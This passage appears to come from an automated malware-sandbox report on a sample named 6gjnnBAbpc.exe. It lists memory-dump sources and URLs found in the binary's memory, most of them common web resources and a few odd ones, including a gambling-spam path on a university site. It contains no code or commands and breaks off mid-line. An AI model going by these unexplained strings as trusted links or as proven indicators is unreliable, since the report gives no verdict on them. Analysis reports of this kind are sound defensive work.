                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.313435203.0000000005090000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.312893371.0000000005080000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308487014.0000000005190000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.308212580.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.307934959.0000000009ED0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-2.1.4.min.js
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://com-sit.com/leistungen/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://com-sit.com/leistungen/central-warehouse/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://com-sit.com/leistungen/intelligent-sourcing/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://com-sit.com/wp-content/uploads/2018/11/Intelligent_Sourcing_GREY.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://com-sit.com/wp-content/uploads/2018/11/Ueberstandsmanagement-gray.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.471026768.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.542767795.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.526478194.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://com-sit.com/wp-content/uploads/2018/11/central-warehouse-grey.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.354780163.0000000004920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://com-sit.com/wp-content/uploads/2018/11/mehr-erfahren-btn.png
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://connect.facebook.net/en_US/sdk/xfbml.customerchat.js#xfbml=1&version=v6.0&autoLogAppEvents=1
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330027641.000000000B7D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330713476.00000000065C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.330942484.0000000004D50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dunsregistered.dnb.com
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.311949440.0000000008D5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://entexture.com
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.338158130.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334520399.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.334804401.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=Poppins%3Aital%2Cwght%400%2C100%3B0%2C200%3B0%2C300%3B0%2C5
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto%3A300%2C300i%2C400%2C400i%2C700%2C700i&#038;subset=la
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.318995335.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.314408979.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.541499970.0000000008D4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ft.upnvj.ac.id/wp-content/uploads/2020/13/slot-deposit-pulsa/
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.350801707.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.317421875.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.445406802.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.318207230.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.437060701.0000000007020000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.438109691.0000000000AD0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.329955461.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.331596236.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.319483908.0000000005180000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.317934204.0000000005180000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.337281299.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.405047777.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.431708063.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.316748435.0000000005180000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.318811735.0000000005180000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.322200864.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.379732787.0000000004A20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gmpg.org/xfn/11
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.536096257.0000000008D5B000.00000004.00000020.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.539003729.0000000008D5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hkoptlens.com/en/join
                      Source: 6gjnnBAbpc.exe, 00000000.00000003.321407915.00000000069C0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.520533612.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.491975144.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.353162006.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.440253994.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.416873019.0000000004B20000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.321120848.000000000A3D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.370708428.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.335549475.0000000005100000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.433068945.00000000076D0000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.434994131.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.524068624.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.442447060.0000000005B10000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.432769760.0000000007000000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.332478187.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.417313627.0000000004620000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.466436556.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.444048500.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 00000000.00000003.439510924.0000000000D60000.00000004.00001000.00020000.00000000.sdmp, 6gjnnBAbpc.exe, 